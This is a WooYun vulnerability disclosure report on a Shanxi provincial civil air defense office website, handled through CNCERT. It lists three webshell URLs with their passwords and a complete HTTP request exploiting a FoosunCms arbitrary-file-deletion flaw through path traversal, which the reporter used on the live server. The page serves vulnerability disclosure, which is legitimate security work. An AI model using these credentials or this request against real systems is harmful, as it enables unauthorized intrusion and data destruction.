当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098859

漏洞标题:山西省人民防空办公室网站发现shell多枚

相关厂商:山西省人民防空办公室

漏洞作者: 路人甲

提交时间:2015-03-02 14:11

修复时间:2015-04-16 14:12

公开时间:2015-04-16 14:12

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

目录浏览权限未关,导致shell被发现,
FoosunCms漏洞未打补丁,导致被多人入侵。

详细说明:

shell地址:
http://www.sxsrf.gov.cn/help/add.aspx 密码ghost
http://www.sxsrf.gov.cn/1.asp 密码gtmlld
http://www.sxsrf.gov.cn/userfiles/511864473244/2013.asp 密码admin888
很多隐藏的shell,我就不去尝试上传了,试了下任意文件删除,删除了上传目录userfiles下的readme.txt文件

POST http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.sxsrf.gov.cn
Content-Length: 2104
Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDAQQSQRBB=EPPECHBAJLLBOPNOJGAJEFGI; ASP.NET_SessionId=azxlqh551wjsbu550gmpxe45; ASPXSpy=71144850f4fb4cc55fc0ee6935badddf; SITEINFO=JB5ljyr0IxdIk+hfYhdObcgN6C8hJ9b9LwdShOJWZXE=; _gscbrs_1831248370=1; _gscu_1831248370=25126075puwrxx21; _gscs_1831248370=25126075rbcd1b21|pv:3
__VIEWSTATE=%2FwEPDwUKMTg4NDc0NDQ5MA9kFgJmD2QWBAIBDxYCHglpbm5lcmh0bWwF4gE8c3BhbiBzdHlsZT0icGFkZGluZy1sZWZ0OjEwcHg7Ij48YSBocmVmPSJqYXZhc2NyaXB0OkFkZERpcignJyk7IiBjbGFzcz0idG9wbmF2aWNoYXIiPuWIm%2BW7uuebruW9lTwvYT4mbmJzcDsmbmJzcDs8YSBocmVmPSJqYXZhc2NyaXB0OlVwRmlsZSgnJywnJyk7IiAgY2xhc3M9InRvcG5hdmljaGFyIj48c3BhbiBzdHlsZT0iY29sb3I6cmVkOyI%2B5LiK5Lyg5paH5Lu2PC9zcGFuPjwvYT48L3NwYW4%2BZAIDDxYCHwAFmAk8ZGl2IHN0eWxlPSJwYWRkaW5nLWxlZnQ6MTBweDsiPuW9k%2BWJjeebruW9lTovVXNlcmZpbGVzLzQ1Nzg0Mzg5OTMxODwvZGl2PjxkaXYgc3R5bGU9InBhZGRpbmctbGVmdDoxMHB4OyI%2B5Zyw5Z2A77yaPGlucHV0IHR5cGU9InRleHQiIGlkPSJzVXJsIiBuYW1lPSJzVXJsIiBzdHlsZT0id2lkdGg6NjAlIiAvPiZuYnNwOzxpbnB1dCB0eXBlPSJidXR0b24iIGNsYXNzPSJmb3JtIiBuYW1lPSJTdWJtaXQiIHZhbHVlPSLpgInmi6nmraTmlofku7YiIG9uY2xpY2s9IlJldHVyblZhbHVlKGRvY3VtZW50LlRlbXBsZXRzbGlzdC5zVXJsLnZhbHVlKTsiIC8%2BPC9kaXY%2BPHRhYmxlIGJvcmRlcj0iMCIgY2xhc3M9InRhYmxlIiB3aWR0aD0iMTAwJSIgY2VsbHBhZGRpbmc9IjUiIGNlbGxzcGFjaW5nPSIxIj48dHIgY2xhc3M9IlRSX0JHX2xpc3QiIG9ubW91c2VvdmVyPSJqYXZhc2NyaXB0Om92ZXJDb2xvcih0aGlzKTsiIG9ubW91c2VvdXQ9ImphdmFzY3JpcHQ6b3V0Q29sb3IodGhpcyk7Ij48dGQgY2xhc3M9Imxpc3RfbGluayIgYWxpZ249ImxlZnQiPjxhIGhyZWY9ImphdmFzY3JpcHQ6RWRpdEZpbGUoJycsJzMzNC5hc3A7MS5qcGcnKSIgY2xhc3M9Imxpc3RfbGluayI%2BPGltZyBzcmM9Ii4uLy4uL3N5c2ltYWdlcy9mb2xkZXIvcmUuZ2lmIiBib3JkZXI9IjAiIGFsdD0i5pS55ZCNIiAvPjwvYT48YSBocmVmPSJqYXZhc2NyaXB0OkRlbEZpbGUoJycsJzMzNC5hc3A7MS5qcGcnKSIgY2xhc3M9Imxpc3RfbGluayI%2BPGltZyBzcmM9Ii4uLy4uL3N5c2ltYWdlcy9mb2xkZXIvZGVsLmdpZiIgYm9yZGVyPSIwIiBhbHQ9IuWIoOmZpCIgLz48L2E%2BICA8aW1nIHNyYz0iLi4vLi4vc3lzSW1hZ2VzL0ZpbGVJY29uL2pwZy5naWYiPjxhIGNsYXNzPSJsaXN0X2xpbmsiIGhyZWY9ImphdmFzY3JpcHQ6c0ZpbGVzKCcve0B1c2VyZGlyZmlsZX0vNDU3ODQzODk5MzE4LzMzNC5hc3A7MS5qcGcnKTsiIG9ubW91c2VvdmVyPSJqYXZhc2NyaXB0OlNob3dEaXZQaWModGhpcywnL1VzZXJmaWxlcy80NTc4NDM4OTkzMTgvMzM0LmFzcDsxLmpwZycsJy5qcGcnLDU3KTsiIG9ubW91c2VvdXQ9ImphdmFzY3JpcHQ6aGlkZERpdlBpYygpOyIgIG9uZGJsY2xpY2s9IlJldHVyblZhbHVlKGRvY3VtZW50LlRlbXBsZXRzbGlzdC5zVXJsLnZhbHVlKTsiPjMzNC5hc3A7MS5qcGc8L3RkPjwvdHI%2BPC90YWJsZT5kZG5E7S6LWhat5JMJgkZwQBZc%2BjNd&sUrl=&Type=DelFile&Path=&ParentPath=&OldFileName=&NewFileName=&filename=..%2Freadme.txt&Urlx=

漏洞证明:

QQ截图20150228205423.jpg


QQ截图20150228205431.jpg


QQ截图20150228205527.jpg


QQ截图20150228210112.jpg

修复方案:

及时打补丁,检查站点目录中的文件,删除shell

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-06 17:13

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。

最新状态:

暂无